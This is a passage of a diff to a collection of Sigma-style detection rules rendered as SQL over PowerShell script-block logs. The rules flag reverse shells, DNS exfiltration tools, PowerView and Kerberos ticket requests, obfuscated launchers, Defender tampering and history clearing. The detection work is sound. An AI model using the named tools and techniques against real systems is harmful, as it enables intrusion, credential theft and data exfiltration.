@@ -5649,94 +5519,99 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" ], - "filename": "posh_ps_shellcode_b64.yml" + "filename": "posh_ps_prompt_credentials.yml" }, { - "title": "PSAsyncShell - Asynchronous TCP Reverse Shell", - "id": "afd3df04-948d-46f6-ae44-25966c44b97f", - "status": "experimental", - "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Request A Single Ticket via PowerShell", + "id": "a861d835-af37-4930-bcd6-5b178bfb54df", + "status": "test", + "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PSAsyncShell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE 
'\\')" ], - "filename": "posh_ps_psasyncshell.yml" + "filename": "posh_ps_request_kerberos_ticket.yml" }, { - "title": "Add New Windows Capability - ScriptBlock", - "id": "155c7fd5-47b4-49b2-bbeb-eb4fab335429", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", + "id": "e54f5149-6ba3-49cf-b153-070d24679126", "status": "experimental", - "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of the capabilities by administartors or users. Filter accordingly" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-WindowsCapability %' ESCAPE '\\' AND ScriptBlockText LIKE '%OpenSSH.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "posh_ps_add_windows_capability.yml" + "filename": "posh_ps_invoke_obfuscation_via_var.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", - "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", + "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron 
Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" ], - "filename": "posh_ps_tamper_defender_remove_mppreference.yml" + "filename": "posh_ps_invoke_obfuscation_stdin.yml" }, { - "title": "Clearing Windows Console History", - "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "title": "Registry-Free Process Scope COR_PROFILER", + "id": "23590215-4702-4a70-8805-8dc9e58314a2", "status": "test", - "description": "Identifies when a user attempts to clear console history. 
An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", - "author": "Austin Songer @austinsonger", + "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1070.003" + "attack.persistence", + "attack.t1574.012" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%$env:COR\\_ENABLE\\_PROFILING%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER\\_PATH%' ESCAPE '\\')" ], - "filename": "posh_ps_clearing_windows_console_history.yml" + "filename": "posh_ps_cor_profiler.yml" }, { - "title": "PowerShell ADRecon Execution", - "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", + "title": 
"Invoke-Obfuscation VAR+ Launcher - PowerShell", + "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", "status": "experimental", - "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", - "author": "Bhabesh Raj", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.discovery", + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], 
@@ -5745,170 +5620,153 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "posh_ps_adrecon_execution.yml" + "filename": "posh_ps_invoke_obfuscation_var.yml" }, { - "title": "Potential WinAPI Calls Via PowerShell Scripts", - "id": "03d83090-8cba-44a0-b02f-0b756a050306", + "title": "Troubleshooting Pack Cmdlet Execution", + "id": "03409c93-a7c7-49ba-9a4c-a00badf2a153", "status": "experimental", - "description": "Detects use of WinAPI Functions in PowerShell scripts", - "author": "Nikita Nazarov, oscd.community, Tim Shelton", + "description": "Detects execution of \"TroubleshootingPack\" cmdlets to leverage CVE-2022-30190 or action similar to \"msdt\" lolbin (as described in LOLBAS)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1106" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)" + "Legitimate usage of \"TroubleshootingPack\" cmdlet for troubleshooting purposes" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%AddSecurityPackage%' ESCAPE '\\' OR ScriptBlockText LIKE '%AdjustTokenPrivileges%' 
ESCAPE '\\' OR ScriptBlockText LIKE '%Advapi32%' ESCAPE '\\' OR ScriptBlockText LIKE '%CloseHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateRemoteThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%DangerousGetHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%FreeLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetLogonSessionData%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetModuleHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcessHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetTokenInformation%' ESCAPE '\\' OR ScriptBlockText LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%kernel32%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoadLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%memcpy%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%msvcrt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ntdll%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenDesktop%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcessToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenWindowStation%' ESCAPE '\\' OR ScriptBlockText LIKE '%QueueUserApc%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%secur32%' ESCAPE '\\' OR ScriptBlockText LIKE '%SetThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualAlloc%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualFree%' 
ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualProtect%' ESCAPE '\\' OR ScriptBlockText LIKE '%WaitForSingleObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteInt32%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. or its affiliates.%' ESCAPE '\\' AND ScriptBlockText LIKE '%function Import-SerialPortUtil %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-TroubleshootingPack%' ESCAPE '\\' AND ScriptBlockText LIKE '%C:\\\\Windows\\\\Diagnostics\\\\System\\\\PCW%' ESCAPE '\\' AND ScriptBlockText LIKE '%-AnswerFile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Unattended%' ESCAPE '\\')" ], - "filename": "posh_ps_accessing_win_api.yml" + "filename": "posh_ps_susp_follina_execution.yml" }, { - "title": "Powershell DNSExfiltration", - "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "title": "Powershell Store File In Alternate Data Stream", + "id": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", "status": "test", - "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", + "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND 
ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath \"$env:comspec\" %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ArgumentList %' ESCAPE '\\' AND ScriptBlockText LIKE '%>%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_dnsexfiltration.yml" + "filename": "posh_ps_store_file_in_alternate_data_stream.yml" }, { - "title": "Malicious PowerView PowerShell Commandlets", - "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", - "status": "test", - "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", - "author": "Bhabesh Raj", + "title": "Suspicious New-PSDrive to Admin Share", + "id": "1c563233-030e-4a07-af8c-ee0490a66d3a", + "status": "experimental", + "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). 
The adversary may then perform actions as the logged-on user.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Should not be any as administrators do not use this tool" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-PSDrive%' ESCAPE '\\' AND ScriptBlockText LIKE '%-psprovider %' ESCAPE '\\' AND ScriptBlockText LIKE '%filesystem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-root %' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND ScriptBlockText LIKE '%$%' ESCAPE '\\')" ], - "filename": "posh_ps_powerview_malicious_commandlets.yml" + "filename": "posh_ps_susp_new_psdrive.yml" }, { - "title": "Dnscat Execution", - "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", - "status": "test", - "description": "Dnscat exfiltration tool execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "title": "Disable Powershell Command History", + "id": "602f5669-6927-4688-84db-0d4b7afb2150", + "status": "experimental", + "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline 
module", + "author": "Ali Alwashali", "tags": [ - "attack.exfiltration", - "attack.t1048", - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1070.003" ], "falsepositives": [ - "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" + "Legitimate script that disables the command history" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" ], - "filename": "posh_ps_dnscat_execution.yml" + "filename": "posh_ps_disable_psreadline_command_history.yml" }, { - "title": "PowerShell Credential Prompt", - "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", - "status": "test", - "description": "Detects PowerShell calling a credential prompt", - "author": "John Lambert (idea), Florian Roth (Nextron Systems)", + "title": "Modify Group Policy Settings - ScriptBlockLogging", + "id": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", + "status": "experimental", + "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1484.001" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel 
IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (ScriptBlockText LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnableSmartScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" ], - "filename": "posh_ps_prompt_credentials.yml" + "filename": "posh_ps_modify_group_policy_settings.yml" }, { - "title": "Troubleshooting Pack Cmdlet Execution", - "id": "03409c93-a7c7-49ba-9a4c-a00badf2a153", + "title": "WMIC Unquoted Services Path Lookup - PowerShell", + "id": "09658312-bc27-4a3b-91c5-e49ab9046d1b", "status": "experimental", - "description": "Detects execution of \"TroubleshootingPack\" cmdlets to leverage CVE-2022-30190 or action similar to \"msdt\" lolbin (as described in LOLBAS)", + "description": "Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Legitimate usage of \"TroubleshootingPack\" cmdlet for troubleshooting purposes" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-TroubleshootingPack%' ESCAPE '\\' AND ScriptBlockText LIKE '%C:\\\\Windows\\\\Diagnostics\\\\System\\\\PCW%' ESCAPE '\\' AND ScriptBlockText LIKE '%-AnswerFile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Unattended%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel 
IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject %' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi %' ESCAPE '\\') AND ScriptBlockText LIKE '% Win32\\_Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%Name%' ESCAPE '\\' AND ScriptBlockText LIKE '%DisplayName%' ESCAPE '\\' AND ScriptBlockText LIKE '%PathName%' ESCAPE '\\' AND ScriptBlockText LIKE '%StartMode%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_follina_execution.yml" + "filename": "posh_ps_wmi_unquoted_service_search.yml" }, { - "title": "Suspicious GetTypeFromCLSID ShellExecute", - "id": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", - "status": "experimental", - "description": "Detects suspicious Powershell code that execute COM Objects", + "title": "Get-ADUser Enumeration Using UserAccountControl Flags", + "id": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", + "status": "test", + "description": "Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%::GetTypeFromCLSID(%' ESCAPE '\\' AND ScriptBlockText LIKE '%.ShellExecute(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\' AND ScriptBlockText LIKE '%useraccountcontrol%' ESCAPE '\\' AND ScriptBlockText LIKE '%-band%' ESCAPE '\\' AND ScriptBlockText LIKE '%4194304%' ESCAPE '\\')" ], - "filename": 
